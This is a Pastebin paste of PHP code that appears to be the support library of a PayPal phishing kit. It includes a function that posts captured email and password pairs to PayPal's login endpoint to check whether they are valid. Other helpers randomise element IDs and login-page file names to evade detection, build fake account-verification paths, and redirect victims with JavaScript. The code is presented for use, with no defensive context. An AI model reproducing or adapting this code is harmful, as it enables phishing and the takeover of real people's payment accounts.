Advertisement
audy_afiary

Untitled

Nov 20th, 2018
1,243
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.96 KB | None | 0 0
  1. <?php
  2. //---------------------------------------------------------------------------------------- ECD
  3. session_start();
  4. error_reporting(0);
  5. set_time_limit(0);
  6. header('Content-type: text/html; charset-UTF-8');
  7. //---------------------------------------------------------------------------------------- DDT
  8. date_default_timezone_set('GMT');
  9. //---------------------------------------------------------------------------------------- SRP
  10. function _9lab_69($r9, $rj, $sf){
  11. return str_replace($r9, $rj, $sf);
  12. }
  13. //---------------------------------------------------------------------------------------- CRL
  14. function Anon_http($srv, $usr, $url, $pstf, $pst, $cks, $rtf, $vrb, $flw, $hdr){
  15. $ci = curl_init();
  16. curl_setopt_array($ci, array(
  17. CURLOPT_TIMEOUT => 0,
  18. CURLOPT_SSL_VERIFYPEER => $srv,
  19. CURLOPT_USERAGENT => $usr,
  20. CURLOPT_URL => $url,
  21. CURLOPT_POSTFIELDS => $pstf,
  22. CURLOPT_POST => $pst,
  23. CURLOPT_COOKIESESSION => $cks,
  24. CURLOPT_COOKIEJAR => dirname(__FILE__).'/1.txt',
  25. CURLOPT_COOKIEFILE => dirname(__FILE__).'/1.txt',
  26. CURLOPT_RETURNTRANSFER => $rtf,
  27. CURLOPT_VERBOSE => $vrb,
  28. CURLOPT_FOLLOWLOCATION => $flw,
  29. CURLOPT_HEADER => $hdr
  30. ));
  31. return curl_exec($ci);
  32. curl_close($ci);
  33. }
  34. //---------------------------------------------------------------------------------------- JNF
  35. function X(){
  36. $caracteres = "ABCDEFGHIJKLMNOPQRSTUVWXYZ-abcdefghijklmnopqrstuvwxyz";
  37. $desordenada = str_shuffle($caracteres);
  38. return substr($desordenada, 1, rand(4,13));
  39. }
  40. function Y(){
  41. return X();
  42. }
  43. //---------------------------------------------------------------------------------------- TRU
  44. function Anon_true($lawl, $tani, $bnadm){
  45. $ck = 'https://www.paypal-prepaid.com/account/authenticatePP.m';
  46. $ac = 'https://www.paypal.com/webapps/auth/loginauth?execution=e1s1';
  47. $in = "execution=e1s1&phonePinLogin=false";
  48. $in .= "&email=$lawl&password=$tani";
  49. $in .= "&_eventId_submit=Log+In&RMC=&flow_name=&fso_enabled=22";
  50. $tr = Anon_http(0, $bnadm, $ck, 0, 0, 1, 1, 0, 1, 0);
  51. $tr = Anon_http(0, $bnadm, $ac, $in, 1, 0, 1, 0, 1, 0);
  52. return (preg_match('/name="password"/i', $tr)) ? false : true;
  53. }
  54. //---------------------------------------------------------------------------------------- ERO
  55. function Ghalat_Assi($error, $tarjama){
  56. if(isset($error) || $error == 'false'){
  57. return "<div id=\"wteurcb\" class=\"footer-sec\">
  58. <div id=\" ".Y()." \" class=\"error-assat\">
  59. <div id=\" ".Y()." \" class=\"lisar\"><img src=\"./lib/img/error.png\"></div>
  60. <div class=\"liman\" > ".$tarjama." </div>
  61. </div>";
  62. }
  63. }
  64. //---------------------------------------------------------------------------------------- RDR
  65. function Hna_lhih($fin, $tkhrbi9, $blad){
  66. return "<html><head>
  67. <meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1252\">
  68. <script language=\"javascript\">
  69. var sir9wd = \"./$fin$tkhrbi9$blad\"
  70. top.location = sir9wd;
  71. </script>
  72. </head>
  73. </html>\n";
  74. }
  75. //---------------------------------------------------------------------------------------- RNM
  76. $login = array("authen.php", "sign-in.php", "signin.php", "login.php", "secure.php");
  77. function Badal_smiya(){
  78. global $login;
  79. $login_jdid = $login[array_rand($login)];
  80. foreach ($login as $kyn_login) {
  81. if (file_exists($kyn_login)) {
  82. return rename($kyn_login,$login_jdid);
  83. }
  84. }
  85. }
  86. //---------------------------------------------------------------------------------------- BDL
  87. function Jib_milaf(){
  88. global $login;
  89. foreach ($login as $dkhol_index) {
  90. if (file_exists($dkhol_index)) {
  91. return $dkhol_index.'?';
  92. }
  93. }
  94. }
  95. //---------------------------------------------------------------------------------------- RNM
  96. $randzab = array("authen-token/", "iduser=", "accessid=", "id=",
  97. "manage-account/", "case-number=", "access-user/", "confirm-id/");
  98. function Rand_bill(){
  99. global $randzab;
  100. return $randzab[array_rand($randzab)];
  101. }
  102. //---------------------------------------------------------------------------------------- FIN
  103.  
  104. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement